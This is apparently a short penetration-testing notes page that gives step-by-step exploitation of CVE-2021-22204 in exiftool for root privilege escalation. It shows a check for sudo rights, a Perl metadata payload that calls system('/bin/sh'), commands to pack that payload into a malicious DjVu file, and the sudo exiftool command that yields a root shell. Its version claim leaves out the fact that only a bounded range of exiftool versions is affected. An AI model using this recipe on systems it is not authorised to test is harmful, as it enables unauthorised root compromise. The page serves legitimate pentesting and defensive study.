Sudo Exiftool Privilege Escalation

Sudo exiftool command might be vulnerable to privilege escalation (PrivEsc).

Investigation

(root) NOPASSWD: /usr/local/bin/exiftool
Copied!

If we can execute "exiftool" command as root, we can gain access to privileges.

Arbitrary Code Execution (CVE-2021-22204) version 7.44+

Reference: https://vk9-sec.com/exiftool-12-23-arbitrary-code-execution-privilege-escalation-cve-2021-22204/

Check the exiftool version. If the exiftool version is later than 7.44, we can execute arbitrary code.

exiftool -ver
Copied!

Exploitation

In local machine, create the payload in a file named “exploit”.

(metadata "\c${system('/bin/sh')};")
Copied!

Next, compress the file.

bzz exploit exploit.bzz
Copied!

Then create the DjVu file using the compressed file.

sudo apt install -y djvulibre-bin
# INFO: Create the initial information chunk.
# BGjp: Create a JPEG background chunk.
# ANTz: Write the compressed annotation chunk with the input file.
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=exploit.bzz
Copied!

Now we have “exploit.djvu” file. Trasfer the file to the target machine and run exiftool as root given the DjVufile.

sudo /usr/local/bin/exiftool exploit.djvu
Copied!

We should get a root shell.

PreviousSudo Dstat Privilege Escalation NextSudo Fail2ban Privilege Escalation

Last updated 2 years ago